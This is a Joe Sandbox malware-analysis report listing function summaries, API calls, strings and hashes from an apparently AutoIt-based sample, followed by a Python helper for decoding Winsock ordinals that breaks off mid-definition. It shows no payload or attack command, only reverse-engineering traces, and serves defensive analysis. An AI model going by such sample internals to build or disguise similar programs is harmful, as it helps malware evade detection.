                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                    • String ID: 255.255.255.255
                                                                    • API String ID: 946324512-2422070025
                                                                    • Opcode ID: ccf7c189b4a9d92af62d3caba4f18cc0561bb1fc336810f576e5841cd5384eff
                                                                    • Instruction ID: c7a38d3f974b15b4f72775757170495dd8a8833e9aa3258da27ffd11a14ac71b
                                                                    • Opcode Fuzzy Hash: ccf7c189b4a9d92af62d3caba4f18cc0561bb1fc336810f576e5841cd5384eff
                                                                    • Instruction Fuzzy Hash: 0F3104352042019FCB20CF28C485EAA77E4EF55318F25C059E9158F392CB72EF85C761
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00973F40
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00973F54
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00973F78
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window
                                                                    • String ID: SysMonthCal32
                                                                    • API String ID: 2326795674-1439706946
                                                                    • Opcode ID: d4d6c26b171c1da44e53fb54db22b288bdcf03247ec36cee92aa8f5b3aff9dbc
                                                                    • Instruction ID: 6e8f9a6c27e5343160ca477f9ad74ef4ffab9c40f1424ff2cb734bb0d5823f0a
                                                                    • Opcode Fuzzy Hash: d4d6c26b171c1da44e53fb54db22b288bdcf03247ec36cee92aa8f5b3aff9dbc
                                                                    • Instruction Fuzzy Hash: DF21BF33610219BFEF118F50CC46FEA3B79EF88754F114214FA19AB1D0D6B1A8909B90
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00974705
                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00974713
                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0097471A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DestroyWindow
                                                                    • String ID: msctls_updown32
                                                                    • API String ID: 4014797782-2298589950
                                                                    • Opcode ID: bed3365a7e529818688dc13c7a4419e00eeb9da0bbf7e6453ef26212a68ae325
                                                                    • Instruction ID: 43f29ceb5d918ee2193e684f15ed106b3541d3395f517db4070885c54efdb04b
                                                                    • Opcode Fuzzy Hash: bed3365a7e529818688dc13c7a4419e00eeb9da0bbf7e6453ef26212a68ae325
                                                                    • Instruction Fuzzy Hash: 7121A1B6604209AFDB14DF68DCD1DB737ADEF8A7A8B004149FA049B251CB30EC11DB60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                    • API String ID: 176396367-2734436370
                                                                    • Opcode ID: f755412d4bb693580ee70ae2414eb0dbcb245ab580c99dc37862201e2b4f17ba
                                                                    • Instruction ID: 86ae42afa664ef09d8a97a2c44420ca9eea450817f9a8cf6f0a66cbe774958f7
                                                                    • Opcode Fuzzy Hash: f755412d4bb693580ee70ae2414eb0dbcb245ab580c99dc37862201e2b4f17ba
                                                                    • Instruction Fuzzy Hash: 612157722142506AC335BB29EC16FBB73DCEFA1324F10842AFD49DB081EB55AD81C295
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00973840
                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00973850
                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00973876
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$MoveWindow
                                                                    • String ID: Listbox
                                                                    • API String ID: 3315199576-2633736733
                                                                    • Opcode ID: 33db41532a0e7ac4da6ddbe3a12b75bc7b7dd8ef280580b4940a0172b857038f
                                                                    • Instruction ID: 41b57ecb5a83baf6cabb7e7de5f8e4894489d1b54abe52abeeb126b6bc9500f0
                                                                    • Opcode Fuzzy Hash: 33db41532a0e7ac4da6ddbe3a12b75bc7b7dd8ef280580b4940a0172b857038f
                                                                    • Instruction Fuzzy Hash: F721B073610118BBEF118F54CC85FAB376EEF89764F10C114F9089B190C671DC5297A0
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00954A08
                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00954A5C
                                                                    • SetErrorMode.KERNEL32(00000000,?,?,0097CC08), ref: 00954AD0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$InformationVolume
                                                                    • String ID: %lu
                                                                    • API String ID: 2507767853-685833217
                                                                    • Opcode ID: e96bd08b8e63a2cce8f4c3d60366269800e8357efb479ae700b6a9ae56d683b6
                                                                    • Instruction ID: 48e1c76efc9cacd0eb85b10e9d6974a897a4c66f71fc10f414eba1c42d79f59b
                                                                    • Opcode Fuzzy Hash: e96bd08b8e63a2cce8f4c3d60366269800e8357efb479ae700b6a9ae56d683b6
                                                                    • Instruction Fuzzy Hash: CA319171A00108AFDB50DF68C881EAE7BF8EF49308F1480A8F909DB252D771ED85CB61
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0097424F
                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00974264
                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00974271
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: msctls_trackbar32
                                                                    • API String ID: 3850602802-1010561917
                                                                    • Opcode ID: 7f3bf888f23b1ee078984f1650eea93ca23d74249ff4dcc165b4fd2ded4f7566
                                                                    • Instruction ID: f39e6257e8410f108ee74142c0b0012b96d01b82f48c3703d89757dfdd460d9a
                                                                    • Opcode Fuzzy Hash: 7f3bf888f23b1ee078984f1650eea93ca23d74249ff4dcc165b4fd2ded4f7566
                                                                    • Instruction Fuzzy Hash: A8110632344248BEEF205F69CC06FAB3BACEF95B64F114514FA59E20A1D371DC619B54
                                                                    APIs
                                                                      • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                      • Part of subcall function 00942DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00942DC5
                                                                      • Part of subcall function 00942DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00942DD6
                                                                      • Part of subcall function 00942DA7: GetCurrentThreadId.KERNEL32 ref: 00942DDD
                                                                      • Part of subcall function 00942DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00942DE4
                                                                    • GetFocus.USER32 ref: 00942F78
                                                                      • Part of subcall function 00942DEE: GetParent.USER32(00000000), ref: 00942DF9
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00942FC3
                                                                    • EnumChildWindows.USER32(?,0094303B), ref: 00942FEB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                    • String ID: %s%d
                                                                    • API String ID: 1272988791-1110647743
                                                                    • Opcode ID: 3b202b976d325215b3e3d8ebc8ae80e908124ba3af4fc9479770cd4931ecbecb
                                                                    • Instruction ID: b303d665162da122b7855239dc4149a0b14891e51c7f955261655ee329122907
                                                                    • Opcode Fuzzy Hash: 3b202b976d325215b3e3d8ebc8ae80e908124ba3af4fc9479770cd4931ecbecb
                                                                    • Instruction Fuzzy Hash: E111AFB1600205ABCF157F748C85FEE37AAFFD4318F048079B909EB292DE3099499B60
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009758C1
                                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009758EE
                                                                    • DrawMenuBar.USER32(?), ref: 009758FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$InfoItem$Draw
                                                                    • String ID: 0
                                                                    • API String ID: 3227129158-4108050209
                                                                    • Opcode ID: f0930562a29152e908a11ed47ec5d5c69570120c2b4177a0a2f4578783ffb1f6
                                                                    • Instruction ID: 6c94997b93967bfa33a2e4af37d7ba398b1f5d8a49a9fd1b694d16d287dd8b8a
                                                                    • Opcode Fuzzy Hash: f0930562a29152e908a11ed47ec5d5c69570120c2b4177a0a2f4578783ffb1f6
                                                                    • Instruction Fuzzy Hash: 44017932504208EFDB609F21D844BAABBB8FF45360F008099FA4DDA161DB708A84AF21
                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0093D3BF
                                                                    • FreeLibrary.KERNEL32 ref: 0093D3E5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeLibraryProc
                                                                    • String ID: GetSystemWow64DirectoryW$X64
                                                                    • API String ID: 3013587201-2590602151
                                                                    • Opcode ID: 134b892a42bb18fbb2cb83b23dce0020e0eb98eb7fdc5dc19ba9338d48214a0e
                                                                    • Instruction ID: 79059795b4d3256436d6ec76e1ce3b3fbdc4a4db29ce02244dcfb01a1cf53a98
                                                                    • Opcode Fuzzy Hash: 134b892a42bb18fbb2cb83b23dce0020e0eb98eb7fdc5dc19ba9338d48214a0e
                                                                    • Instruction Fuzzy Hash: F9F055B690BB218BD37112206C38AAE3359AF00705F988429F916E2045EB20CE80CEC2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2c08788c1616eee6f559080739ba74115317d1da74d2ee4bc3372bb30bf9fb50
                                                                    • Instruction ID: 6f4455df1ddaa773d6f3347347a11d1769cea07ca7f0176ffa878d7175a9755b
                                                                    • Opcode Fuzzy Hash: 2c08788c1616eee6f559080739ba74115317d1da74d2ee4bc3372bb30bf9fb50
                                                                    • Instruction Fuzzy Hash: 9FC14C75A0020AEFDB14CFA4C894EAEBBB5FF88704F108598E615EB251D771ED41DB90
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: __alldvrm$_strrchr
                                                                    • String ID:
                                                                    • API String ID: 1036877536-0
                                                                    • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                    • Instruction ID: 6987746c2fa5abe8163f56348689659d9ad3bffef2560c04cc6ae534b07079b0
                                                                    • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                    • Instruction Fuzzy Hash: 55A11672F0438AAFEB158F19C8917EABBF9EF69350F14416DE5959B281C23889C2C750
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInitInitializeUninitialize
                                                                    • String ID:
                                                                    • API String ID: 1998397398-0
                                                                    • Opcode ID: 106fb710beccd7f1cc177696f6f346db61c2511039dd39badb8f7b3371ada0b5
                                                                    • Instruction ID: ecac808ce0df68c75a58b93e2774b1c73534628f298cb2c65074fdefdf8aa075
                                                                    • Opcode Fuzzy Hash: 106fb710beccd7f1cc177696f6f346db61c2511039dd39badb8f7b3371ada0b5
                                                                    • Instruction Fuzzy Hash: DAA116756047009FC710DF29C985A2AB7E9FF89714F048859F98ADB362DB30EE05CB92
                                                                    APIs
                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0097FC08,?), ref: 009405F0
                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0097FC08,?), ref: 00940608
                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,0097CC40,000000FF,?,00000000,00000800,00000000,?,0097FC08,?), ref: 0094062D
                                                                    • _memcmp.LIBVCRUNTIME ref: 0094064E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                    • String ID:
                                                                    • API String ID: 314563124-0
                                                                    • Opcode ID: 5996e8987ecba48f01d54a0791180a5876edbff77ad8674e5c4d030b2fdd4de5
                                                                    • Instruction ID: d7a443dfd0a0f255739ba4871becaefedcd52c51e39ba9ba7696ab9cc0501251
                                                                    • Opcode Fuzzy Hash: 5996e8987ecba48f01d54a0791180a5876edbff77ad8674e5c4d030b2fdd4de5
                                                                    • Instruction Fuzzy Hash: 8281F975A00109EFCB04DF94C984EEEB7B9FF89315F204598F606AB250DB71AE46CB61
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0
                                                                    • Opcode ID: 8cd172302c2ba53d20598fd0976e3db2a8b55795d44cbd0d84287f16eebc19be
                                                                    • Instruction ID: 26edc3317f2c714eba2aa19562f741a4caab0168c32c480b54107ddb10fa17b7
                                                                    • Opcode Fuzzy Hash: 8cd172302c2ba53d20598fd0976e3db2a8b55795d44cbd0d84287f16eebc19be
                                                                    • Instruction Fuzzy Hash: CD416C31A00125AFDB357BFDBC45BBE3AA8EFE1370F144226F42CD61E5E63449A152A1
                                                                    APIs
                                                                    • GetWindowRect.USER32(00BBE670,?), ref: 009762E2
                                                                    • ScreenToClient.USER32(?,?), ref: 00976315
                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00976382
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientMoveRectScreen
                                                                    • String ID:
                                                                    • API String ID: 3880355969-0
                                                                    • Opcode ID: c29f466e4ac074ea2a55d9ed15847792385ba33239d31335fbbeb257a57a3b38
                                                                    • Instruction ID: f6ad3acf272682f561cce66a65d2e39598ff34eb2fc385d739145ff26a36f0c5
                                                                    • Opcode Fuzzy Hash: c29f466e4ac074ea2a55d9ed15847792385ba33239d31335fbbeb257a57a3b38
                                                                    • Instruction Fuzzy Hash: 8B514C72A00649AFCF14DF68D980AAE7BB9FF85360F108259F819972A0D730ED81DB50
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00961AFD
                                                                    • WSAGetLastError.WSOCK32 ref: 00961B0B
                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00961B8A
                                                                    • WSAGetLastError.WSOCK32 ref: 00961B94
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$socket
                                                                    • String ID:
                                                                    • API String ID: 1881357543-0
                                                                    • Opcode ID: 1b9efd61b95ed3a13337afde917d322704a139b11386abfcfbdf3eb636675305
                                                                    • Instruction ID: 70146b392454769c4e944f3344cadceeeafd5ffa5ed7667d09ac0e33424323b3
                                                                    • Opcode Fuzzy Hash: 1b9efd61b95ed3a13337afde917d322704a139b11386abfcfbdf3eb636675305
                                                                    • Instruction Fuzzy Hash: 2D419075600200AFE720AF39C886F2A77E5EB45718F588458FA1A9F3D3D772DD428B91
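How to read API bullets like the ones in the two listings above (the `socket.WSOCK32` / `#21.WSOCK32` function and the `GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW)` function), as an added triage helper that is not part of the Joe Sandbox report or of the sample. Joe Sandbox prints imports the binary resolves by ordinal as `#<n>.<module>`; per the WSOCK32.DLL export ordinal table, ordinal 21 is `setsockopt`, and the arguments shown (`0000FFFF` = SOL_SOCKET, `00000020` = SO_BROADCAST, optlen 4) match a call enabling broadcast on the UDP socket created just before it (`socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)`). The ordinal and constant tables below are partial by assumption (only what these listings need); the sample lines are copied from this page and labelled as constructed input.

```python
"""Decode the 'APIs' bullets of a Joe Sandbox function listing.

Added example for reading this report; it is not Joe Sandbox code and not
part of the sample. Constant values come from the Winsock/Win32 headers.
Assumption: the WSOCK32.DLL ordinal table is partial (only the entries
needed for the listings on this page).
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# WSOCK32.DLL export ordinals (partial). Joe Sandbox prints ordinal imports
# as "#<n>.WSOCK32", so "#21" resolves to setsockopt.
WSOCK32_ORDINALS: Dict[int, str] = {12: "ioctlsocket", 21: "setsockopt", 23: "socket"}

# Per-API argument names and the symbolic values worth resolving.
ARG_DECODERS = {
    ("WSOCK32", "socket"): [
        ("af", {2: "AF_INET", 23: "AF_INET6"}),
        ("type", {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}),
        ("protocol", {0: "IPPROTO_IP", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}),
    ],
    ("WSOCK32", "setsockopt"): [
        ("s", None),
        ("level", {0xFFFF: "SOL_SOCKET"}),
        ("optname", {0x0004: "SO_REUSEADDR", 0x0008: "SO_KEEPALIVE", 0x0020: "SO_BROADCAST"}),
        ("optval", None),
        ("optlen", None),
    ],
}

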